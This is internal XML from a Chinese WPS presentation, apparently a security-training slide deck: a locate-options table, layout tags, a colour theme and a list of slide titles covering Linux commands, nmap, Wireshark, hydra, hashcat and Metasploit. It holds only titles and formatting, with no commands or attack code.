                        <a:t>路径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不输出文件</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>名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...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设置数据库所在</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>目录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i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忽略</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>大小写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限制最大查找</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>数量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4070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q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静默执行</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>模式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406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-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
                        <a:t>r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使用正则</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>表达式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6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TABLE_ENDDRAG_ORIGIN_RECT" val="811*228"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="42*326*811*228"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag15.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="811*228"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="42*326*811*228"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag16.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="552*173"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="42*274*552*173"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag17.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="811*228"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="42*326*811*228"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag18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19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1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2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3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4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5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6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7.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="814*208"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="42*304*814*208"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag28.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="788*330"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="101*163*788*330"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag29.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ISPRING_PRESENTATION_TITLE" val="简介"/>
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiMDJhNWZiMmUyMGY4ZDMwZDY1MjlmNDVkMjgyMTgzZGEifQ=="/>
  <p:tag name="KSO_WPP_MARK_KEY" val="156cdff4-1078-446b-af05-d9d237a2dda9"/>
  <p:tag name="commondata" val="eyJoZGlkIjoiYjM2N2ExNTMxZmQxYWJiZmJhNjFiNDA4Mzk1NTQ3MzMifQ==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2200">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="0162A7"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="BC2823"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="BC2823"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="0162A7"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="BC2823"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="0162A7"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="BC2823"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="0162A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18187</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>1358</Paragraphs>
  <Slides>82</Slides>
  <Notes>74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Arial</vt:lpstr>
      <vt:lpstr>JetBrains Sans Bundled</vt:lpstr>
      <vt:lpstr>0xProto Nerd Font</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>Package</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>基础命令-find</vt:lpstr>
      <vt:lpstr>基础命令-find-练习-按名称查找文件</vt:lpstr>
      <vt:lpstr>基础命令-find-练习-按权限查找文件</vt:lpstr>
      <vt:lpstr>基础命令-find-练习-基于所有者和组查找文件</vt:lpstr>
      <vt:lpstr>基础命令-find-练习-根据日期和时间查找文件</vt:lpstr>
      <vt:lpstr>基础命令-find-练习-根据大小查找文件和目录</vt:lpstr>
      <vt:lpstr>基础命令-locate</vt:lpstr>
      <vt:lpstr>基础命令-strings</vt:lpstr>
      <vt:lpstr>基础命令-file</vt:lpstr>
      <vt:lpstr>基础命令-grep</vt:lpstr>
      <vt:lpstr>基础命令-grep-练习</vt:lpstr>
      <vt:lpstr>基础命令-sed</vt:lpstr>
      <vt:lpstr>基础命令-sed-练习</vt:lpstr>
      <vt:lpstr>基础命令-awk</vt:lpstr>
      <vt:lpstr>基础命令-awk-内置变量</vt:lpstr>
      <vt:lpstr>基础命令-awk-练习</vt:lpstr>
      <vt:lpstr>基础命令-paste</vt:lpstr>
      <vt:lpstr>基础命令-paste-练习</vt:lpstr>
      <vt:lpstr>基础命令-cut</vt:lpstr>
      <vt:lpstr>基础命令-cut-练习</vt:lpstr>
      <vt:lpstr>基础命令-tr</vt:lpstr>
      <vt:lpstr>基础命令-tr-练习</vt:lpstr>
      <vt:lpstr>基础命令-tee</vt:lpstr>
      <vt:lpstr>基础命令-tee-练习</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>端口扫描-nmap</vt:lpstr>
      <vt:lpstr>端口扫描-nmap-script</vt:lpstr>
      <vt:lpstr>端口扫描-nmap-script</vt:lpstr>
      <vt:lpstr>流量捕获-tcpdump</vt:lpstr>
      <vt:lpstr>流量捕获-tcpdump-基本用法</vt:lpstr>
      <vt:lpstr>流量分析-wireshark</vt:lpstr>
      <vt:lpstr>流量分析-Wireshark小技巧</vt:lpstr>
      <vt:lpstr>流量分析-Wireshark小技巧</vt:lpstr>
      <vt:lpstr>流量分析-Wireshark小技巧</vt:lpstr>
      <vt:lpstr>流量分析-Wireshark小技巧</vt:lpstr>
      <vt:lpstr>流量分析-Wireshark小技巧</vt:lpstr>
      <vt:lpstr>流量分析-tshark</vt:lpstr>
      <vt:lpstr>爆破工具-hydra</vt:lpstr>
      <vt:lpstr>爆破工具-hydra-常用参数及用法</vt:lpstr>
      <vt:lpstr>爆破工具-hydra-常见用法</vt:lpstr>
      <vt:lpstr>密码破解-hashcat</vt:lpstr>
      <vt:lpstr>密码破解-hashcat-常用参数</vt:lpstr>
      <vt:lpstr>密码破解-hashcat-攻击模式</vt:lpstr>
      <vt:lpstr>密码破解-hashcat-支持的hash</vt:lpstr>
      <vt:lpstr>密码破解-hashcat-掩码字符集</vt:lpstr>
      <vt:lpstr>密码破解-hashcat-掩码示例</vt:lpstr>
      <vt:lpstr>密码破解-hashcat-自定义字符集</vt:lpstr>
      <vt:lpstr>密码破解-hashcat-案例</vt:lpstr>
      <vt:lpstr>爆破工具-john</vt:lpstr>
      <vt:lpstr>爆破工具-john-常用参数及用法</vt:lpstr>
      <vt:lpstr>爆破工具-john-常见用法</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>msf-架构</vt:lpstr>
      <vt:lpstr>msf-模块-辅助模块</vt:lpstr>
      <vt:lpstr>msf-模块-编码模块</vt:lpstr>
      <vt:lpstr>msf-模块-免杀模块</vt:lpstr>
      <vt:lpstr>msf-模块-利用模块</vt:lpstr>
      <vt:lpstr>msf-模块-空指令模块</vt:lpstr>
      <vt:lpstr>msf-模块-载荷模块</vt:lpstr>
      <vt:lpstr>msf-模块-后渗透模块</vt:lpstr>
      <vt:lpstr>msf-数据库</vt:lpstr>
      <vt:lpstr>msf-数据库-初始化</vt:lpstr>
      <vt:lpstr>msf-数据库-服务扫描</vt:lpstr>
      <vt:lpstr>msf-内联选项</vt:lpstr>
      <vt:lpstr>msf-模块信息详细信息查看</vt:lpstr>
      <vt:lpstr>msf-载荷</vt:lpstr>
      <vt:lpstr>msf-载荷</vt:lpstr>
      <vt:lpstr>msf-正向shell与反向shell</vt:lpstr>
      <vt:lpstr>msf-msfvenom</vt:lpstr>
      <vt:lpstr>msf-msfvenom-编码</vt:lpstr>
      <vt:lpstr>msf-exploit-rank</vt:lpstr>
      <vt:lpstr>msf-exploit-meterpreter-常用命令</vt:lpstr>
      <vt:lpstr>msf-exploit-meterpreter-migrate</vt:lpstr>
      <vt:lpstr>msf-exploit-meterpreter-流量抓发</vt:lpstr>
      <vt:lpstr>msf-exploit-meterpreter-流量抓发</vt:lpstr>
      <vt:lpstr>msf-exploit-meterpreter-流量抓发</vt:lpstr>
      <vt:lpstr>msf-exploit-meterpreter-流量抓发</vt:lpstr>
      <vt:lpstr>msf-exploit-meterpreter-后渗透</vt:lpstr>
      <vt:lpstr>msf-exploit-meterpreter-后渗透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</dc:creator>
  <dc:description>锐旗设计；https://9ppt.taobao.com</dc:description>
  <cp:lastModifiedBy>泡泡</cp:lastModifiedBy>
  <cp:revision>521</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-05-05T08:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-28T09:56:36Z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2052-12.1.0.18240</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>F187B946716F47F99CA60BBD51574DAE_12</vt:lpwstr>
  </property>
</Properties>
</file>